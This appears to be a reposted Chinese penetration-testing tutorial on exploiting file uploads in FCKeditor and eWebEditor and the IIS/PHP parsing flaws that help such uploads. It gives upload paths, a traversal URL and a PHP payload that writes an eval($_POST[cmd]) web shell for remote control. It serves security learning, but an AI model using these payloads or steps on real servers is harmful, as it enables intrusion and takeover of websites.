fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
一.编辑器漏洞
1.编辑器
编辑器属于第三方软件,它的作用是方便网站管理员上传或编辑网站上的内容,类似我们电脑上的Word文档。
编辑器通常分为两种情况:
(1) 不需要后台验证,可以直接在前台访问且操作。通过方法找到编辑器,再进行目录爆破(用御剑去扫描网站的目录)和蜘蛛爬行(AWS扫描器去判断是否存在网站编辑器)。
通常,存在 www.xxx.com/edit 或 www.xxx.com/uploadfiles 的域名,很可能会存在编辑器。
(2) 需要后台验证,才能操作编辑器。先通过漏洞或其他方法登录后台。
常用编辑器包括:
FCKeditor
EWEbeditor
CKFinder
UEDITOR
DotNet TextBox
Cute Editor
其中,用的次数较多的两种编辑器是FCK和eWEB,本篇博客将用这两种编辑器作演示。
2.FCKeditor编辑器漏洞利用
FCKeditor常见上传目录:
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
(1) FCK编辑器漏洞 —— “.” 变 “_” 绕过方法
在高版本fck中,直接上传或抓包修改文件名“a.asp;.jpg”,都会将前面的点变成下划线,也就是变成“a_asp;.jpg”,这样我们的文件名解析就无效果了。绕过方法是突破建立文件夹,其实质是利用我们IIS6.0的目录解析(参考前文)。
编辑器漏洞利用常见步骤如下:
找到编辑器。可以通过编辑器路径的文件名来判断是什么编辑器。
确认版本。
搜索该版本编辑器的漏洞利用。
假设路径为“/fckeditor/editor/filemanager/connectors/test.html”,文件名中包含“fck”,可以直接判定为FCK编辑器。打开如下图所示:
在FCKeditor中选中“a.asp;.png”并成功上传,如下图所示。
打开服务器,可以看到成功上传的图片文件。它名字被修改为“a_asp;.png”,这就是FCK高版本的过滤,它将“.”修改为“_”。
(2) FCK编辑器还有一个突破文件上传漏洞
它是利用IIS6的目录解析漏洞,我们先建立一个“a.asp”文件夹,然后上传图片一句话木马“a_asp;.png”,IIS6目录解析漏洞会将“a.asp”目录下的文件都解析成asp文件去执行。
第一步,打开FCK编辑器并在“a.asp”目录下上传一个“b.asp”文件夹。注意,在“Current Folder”中需要填写“/a.asp”。
第二步,打开BurpSuite软件抓包。
可以看到,我们在a.asp目录下创建了“b_asp”文件夹,这是因为“.”被FCK漏洞替换成了“_”。
第三步,这样“a.asp”文件夹就被成功创建,接着将一句话木马上传至该文件夹中。
上传之后如下图所示:
当一句话木马上传成功之后,我们就可以成功利用Caidao进行Webshell目录获取了。最后补充一个FCK编辑器漏洞综合利用工具:https://www.webshell.cc/4479.html
3.eWebEditor编辑器漏洞
eWebEditor编辑器漏洞利用的基本流程如下:
(1) 进后台
eWeb编辑器需要登录后台,其默认数据库地址是:ewebeditor/db/ewebeditor.mdb
(2) eweb遍历漏洞
利用该漏洞遍历文件目录、查看整个网站结构及敏感信息
ewebeditor/admin_uploadfile.asp?id=14&dir=./
(3) 修改样式表上传文件
如下图所示,这里选择某个样式表进行设置。
然后在图片类型中,增加“asa”类型。“.asa”可以被当成“.asp”文件去执行,而网站可能会过滤“asp”类型的后缀,所以这里添加“.asa”。
打开“工具栏”,显示如下图所示:
点击“按钮设置”,准备添加按钮。
选择“插入或修改图片”,然后“保存设置”。
此时返回页面,点击“预览”可以看到我们已经添加的“插入或修改图片”按钮。
然后直接上传“1.asa”文件,如下图所示。
然后点击代码,可以看到这是一个木马的文件路径。
所以,编辑器其实就是一个上传点,通过解析漏洞或多种文件上传漏洞可以实现绕过并上传一句话木马,从而提权。
二.IIS高版本上传
IIS6.0毕竟是一个低版本,除了靶场和僵尸站很少能够遇到。真实的渗透中,会遇到很多的问题,比如WAF、高版本过滤、安全狗、被拦截绕过、不解析等等。接下来分享一个IIS高版本上传思路。
1.畸形解析漏洞
畸形解析漏洞影响版本:IIS7、IIS7.5、Nginx<0.8.03
漏洞产生条件是开启Fast-CGI或php配置文件中cgi.fix_pathinfo
其漏洞不是IIS本身的问题,而是PHP配置不当造成的问题,根本原因是开启了cgi.fix_pathinfo选项。由于该漏洞是php配置造成,并且默认开启该功能,所以它影响了IIS7、IIS7.5、IIS8.5等多个版本,凡是IIS+PHP都有可能会有这个漏洞。
漏洞利用方法:当我们上传一张名为“1.jpg”的图片文件,并且这张图片文件里包含以下代码。
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>
那么它会生成一个叫shell.php的脚本文件,并写入我们的一句话,密码为cmd。而一句话的位置是:上传的图片文件名字“/shell.php”。如果图片没有被改名,那么现在我们的一句话文件在“1.jpg/shell.php”中。
2.案例分析
假设我们向IIS+PHP搭建的远程服务器上传“1.jpg”文件。
开启服务器如下图所示:
“1.jpg”代码包含如下代码 ,它能显示PHP配置信息。
<?php phpinfo(); ?>
通过URL能够访问PHP的版本信息,如下图所示。该URL运行了我们的PHP代码,所以才返回相应的配置信息。在URL(49.234.12.78/1.jpg/.php)中,首先访问“.php”文件,它是不存在的,所以跳到前面的“1.jpg”位置,而“1.jpg”是存在的并且包含php代码,就会把它当成php文件去执行,并获取PHP配置信息。
为什么IIS高版本会存在这个漏洞呢?
这是因为IIS高版本在搭建php网站的时候,它会开启CGI/FastCGI,并且php配置文件选项默认开启。所以,该畸形解析漏洞不光存在于IIS7、IIS7.5,还有IIS8、IIS10等版本。
接着我们演示另一个代码,将“1.jpg”内容修改如下,直接写入shell。
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?>
访问“/1.jpg/shell.php”显示的内容为空。
但是此时会在服务器生成一个名为“shell.php”的文件,如下图所示:
并且“shell.php”包含了我们的一句话木马。
这样通过Caidao即可访问该页面,并获取服务器的文件目录。
3.aspx漏洞
aspx它有一个“web.config”的配置文件,它规定我们上传文件的后缀。
我们可以自定一个后缀名来解析aspx文件。
换句话说,当我们遇到可以上传配置文件的时候,则上传我们修改好的配置文件,然后自定义一个后缀名如“.ad”,从而绕过WAF或检测,上传成功之后它会解析成aspx并执行。如下图所示:
所以,当我们遇到可以上传配置文件的时候,通过该方法实现绕过,从而提权。
三.总结
写到这里,这篇基础性文章就此结束,最后希望这篇基础性文章对您有所帮助。作者也是这个领域的菜鸟一枚,希望与您共同进步,共勉。
http://www.taodudu.cc/news/show-5029758.html
相关文章:
- fckeditor编辑器漏洞
- mediacoder固定质量CRF
- MediaCoder字幕乱码问题(中文变方框)
- 推荐一个工具MediaCoder
- AVI格式转换问题采用mediacoder和图片转换成AVI的makeavi软件
- MediaCoder的CUDA H.264编码技术预览及测试报告
- 配有N显卡的i系列CPU笔记本MediaCoder_x64压缩视频最快速参数设置
- 使用MediaCoder压制高质量H264影片
- [软件更新]MediaCoder(影音转码快车)0.7.1.4480
- MediaCoder字幕乱码问题
- 全能音视频转码 MediaCoder 0.8.36.5757 专业版
- java mediacoder_MediaCoder转移动设备MP4(高清)
- java mediacoder_MediaCoder
- 关于MediaCoder使用过程问题整理
- [VB6]取消控件数组
- C#--控件数组遍历
- MFC 类似控件数组实现方法
- java控件数组_多维控件数组
- C#控件数组实现
- VB6实现动态增加和删除控件数组中的控件2021-06-02
- java checkbox数组_Java通过复选框控件数组实现添加多个复选框控件
- java按钮数组_Java按钮控件数组实现计算器界面
- VB控件数组之操作技巧
- 按钮控件数组实现计算器界面
- 添加控件数组
- C#控件数组
- 在 Visual Basic .NET 和 Visual C# .NET 中创建控件数组
- java控件数组_java通过复选框控件数组实现添加多个复选框控件
- BCB高手进阶-如何实现控件数组
- 控件数组
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御相关推荐
- [网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步.前文分享了文件上传漏洞和IIS6.0解析漏洞,包括PHP345文件绕过上传.Win ...
- nginx 上传文件漏洞_浅谈文件上传漏洞(其他方式绕过总结)
前言 上一篇文章简单的介绍了绕过客户端检测,现在总结一下其他方式绕过. 正文 1.1 服务端MIME类型检测绕过 检测原理:用户上传文件时,服务器会获取这个文件的MIME值,与事先设置好的进行比对,如 ...
- tomcat temp 大量 upload 文件_渗透测试之文件上传漏洞总结
文末下载上传环境源码 客户端 js检查 一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式. 查看源代码可以看到有如下代码对上传文件类型进行了限制: 我们 ...
- python 判断文件类型_python接口自动化(三十) 上传文件时自动判断文件类型(filetype)...
前言 如何判断一个文件的类型呢,判断这个文件是png还是jpg,还是MP3文件?filetype包是python用来判断文件类型的依赖包,github地址:https://github.com/h2n ...
- python接口自动化(三十) 上传文件时自动判断文件类型(filetype)
前言 如何判断一个文件的类型呢,判断这个文件是png还是jpg,还是MP3文件?filetype包是python用来判断文件类型的依赖包,github地址:https://github.com/h2n ...
- 【信安学习笔记三】文件上传
个人学习参考用笔记 目录 前言 一.文件上传 **定义** **危害** **查找及判断** **分类** 二.验证与绕过 前端防护 后端防护 (一)黑名单 (二)白名单 (三)内容及其他 三.漏洞 ...
- JavaWeb学习总结(五十)——文件上传和下载
在Web应用系统开发中,文件上传和下载功能是非常常用的功能,今天来讲一下JavaWeb中的文件上传和下载功能的实现. 对于文件上传,浏览器在上传的过程中是将文件以流的形式提交到服务器端的,如果直接使用 ...
- [网络安全自学篇] 三十三.文件上传之绕狗一句话原理和绕过安全狗(六)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了Upload-labs靶场及文件上传漏洞20道CTF题目,并结合C ...
- [网络安全自学篇] 三十一.文件上传之Upload-labs靶场及CTF题目01-10(四)
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了编辑器漏洞和IIS高版本文件上传漏洞,包括FCKeditor.eWeb ...
最新文章
- 基于大数据的Uber数据实时监控(Part 4:Spark Streaming、DataFrames和HBase)
- js中两个对象的比较
- superset配置与初步使用
- python数据收集整理教案_《数据收集整理(例1)》教案
- python 全栈开发,Day81(博客系统个人主页,文章详情页)
- MAC-终端命令大全
- 射频功率dbm-w换算表
- netty4.1 “File does not contain valid private key” 解决方法
- windowspython专用装B代码
- word脚注、尾注小技巧|怎么删除尾注的横线|怎么快速删除页眉的横线|怎么快速将尾注和脚注转为带方括号的格式
- 改进灰色预测matlab代码,灰色预测模型Matlab代码[比赛已经用过,保真好使]
- 【复习总结】玫瑰人生 La Vie en Rose
- 倪文迪陪你学蓝桥杯2021寒假每日一题:1.25日(2019省赛A组第3题)
- Python 代码实现ArcGis 标注Label转注记Annotation
- 基于微信小程序的网上订餐系统 报告+任务书+开题报告+文献综述+中期PPT+外文翻译及原文+PPT+项目源码及数据库文件
- 用C语言图形库画一个红色爱心
- MFC+OpenGL显示视频流图片
- 笛卡尔坐标系和极坐标系的互相转换
- 如何搭建一个自己的音乐播放器-使用腾讯云轻量应用服务器搭建YesPlayMusic网易云播放器
- 笑谈XML,xsd与xsl文件的区别